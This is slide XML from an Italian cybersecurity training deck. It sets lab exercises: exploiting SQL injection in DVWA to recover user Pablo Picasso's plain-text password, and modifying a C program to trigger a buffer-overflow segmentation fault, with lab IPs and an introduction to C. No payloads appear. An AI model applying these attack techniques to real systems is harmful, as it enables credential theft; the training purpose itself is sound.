        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1334326" y="7045424"/>
            <a:ext cx="7384659" cy="14719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000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Livello difficoltà DVWA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>LOW </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Kali Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.13.100/24 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Metasploitable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.13.150/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>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TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="3189397"/>
            <a:ext cx="16230600" cy="2066925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Utilizzando le tecniche viste nelle lezione teoriche, sfruttare la vulnerabilità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>presente sulla Web Application DVWA per recuperare in chiaro la password dell’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Pablo Picasso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> (ricordatevi che una volta trovate le password, c’è bisogno di un ulteriore step per recuperare la password in chiaro).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1492859" y="6115105"/>
            <a:ext cx="5642843" cy="646430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5320"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Requisiti laboratorio:</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798106" y="-2277394"/>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2873192" y="3582051"/>
            <a:ext cx="3925100" cy="7766485"/>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4" id="14"/>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15" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15830271" y="-601734"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1468572" y="-188615"/>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SYSTEM EXPLOIT  BOF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="1255542"/>
            <a:ext cx="15381560" cy="688974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>TRACCIA - GIORNO  3 :</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20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2142480"/>
            <a:ext cx="16230600" cy="3114675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Leggete attentamente il programma in allegato. Viene richiesto di: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Descrivere il funzionamento del programma prima dell’esecuzione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Riprodurre ed eseguire il programma nel laboratorio - le vostre ipotesi sul funzionamento erano corrette? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Modificare il programma affinché si verifichi un errore di segmentazione.</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TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1453220" y="6037973"/>
            <a:ext cx="6772807" cy="2823210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>SUGGERIMENTO:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Medium"/>
              </a:rPr>
              <a:t>Ricordate che un BOF sfrutta una vulnerabilità nel codice relativo alla mancanza di controllo dell’input utente rispetto alla capienza del vettore di destinazione. Concentratevi quindi per trovare la soluzione nel punto dove l’utente può inserire valori in input, e modificate il programma in modo tale che l’utente riesca ad inserire più valori di quelli previsti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8595937" y="8031946"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15278813" y="1951748"/>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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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6207782" y="8031946"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1312599" y="-220910"/>
            <a:ext cx="10754873" cy="9975145"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9975145" w="10754873">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10754873" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10754873" y="9975145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9975145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>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2753760" y="33924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72644"/>
            <a:ext cx="14768151" cy="634131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>1.1 - BREVE DESCRIZIONE LINGUAGGIO C</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9" id="9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="9946020" y="116760"/>
            <a:ext cx="7255009" cy="10053480"/>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2" id="1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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-1251187">
            <a:off x="5835589" y="2311077"/>
            <a:ext cx="3152168" cy="1457878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1457878" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="1457878"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152168" y="1457878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1457878"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>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3" id="23"/>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24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="527438" y="2745164"/>
            <a:ext cx="5680343" cy="5119306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3433"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2452">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il linguaggio di programmazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2452">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2452">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> è uno dei più noti ed utilizzati. Essendo molto potente, trova applicazione in moltissimi contesti (dal gaming, allo sviluppo di sistemi operativi ed emedded), poiché permette di costruire applicazioni veloci e funzionali. Questa guida chiara e completa parte dalle basi del C, per arrivare a fornire una panoramica di tutte le principali funzionalità supportate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="2275134"/>
            <a:ext cx="8859048" cy="5355079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3563"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2545" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> è un linguaggio procedurale imperativo, che supporta la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:hlinkClick r:id="rId6" tooltip="https://it.wikipedia.org/wiki/Programmazione_strutturata"/>
              </a:rPr>
              <a:t>programmazione strutturata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:hlinkClick r:id="rId7" tooltip="https://it.wikipedia.org/wiki/Visibilit%C3%A0_(programmazione)"/>
              </a:rPr>
              <a:t>visibilità lessicale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:hlinkClick r:id="rId8" tooltip="https://it.wikipedia.org/wiki/Ricorsione"/>
              </a:rPr>
              <a:t>ricorsione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, e possiede un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:hlinkClick r:id="rId9" tooltip="https://it.wikipedia.org/wiki/Sistema_dei_tipi"/>
              </a:rPr>
              <a:t>sistema di tip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>o statico. Il linguaggio C permette l'utilizzo a basso livello alla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:hlinkClick r:id="rId10" tooltip="https://it.wikipedia.org/wiki/Memoria_(informatica)"/>
              </a:rPr>
              <a:t>memoria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e fornisce costrutti che combaciano efficientemente con le istruzioni del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:hlinkClick r:id="rId11" tooltip="https://it.wikipedia.org/wiki/Linguaggio_macchina"/>
              </a:rPr>
              <a:t>linguaggio macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3563"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3563"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2545">
                <a:solidFill>
                  <a:srgbClr val="010101"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nonostante le sue capacità a basso livello, il linguaggio è adatto per essere programmato su piattaforme diverse: un programma in C conforme scritto per essere portabile può essere compilato per una vasta gamma di piattaforme con poche variazioni al suo codice sorgente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="1545475">
            <a:off x="5839518" y="6205643"/>
            <a:ext cx="3152168" cy="1457878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1457878" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152168" y="1457877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1457877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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6207782" y="8031946"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1312599" y="-220910"/>
            <a:ext cx="10754873" cy="9975145"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9975145" w="10754873">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10754873" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10754873" y="9975145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9975145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>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2753760" y="33924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72644"/>
            <a:ext cx="14768151" cy="634131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>1.2 - BUFFER OVERFLOW</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="9946020" y="116760"/>
            <a:ext cx="7255009" cy="10053480"/>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12" id="1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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="1545475">
            <a:off x="6367954" y="6321996"/>
            <a:ext cx="3152168" cy="1457878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1457878" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152167" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152167" y="1457878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1457878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="3036397" y="1487189"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
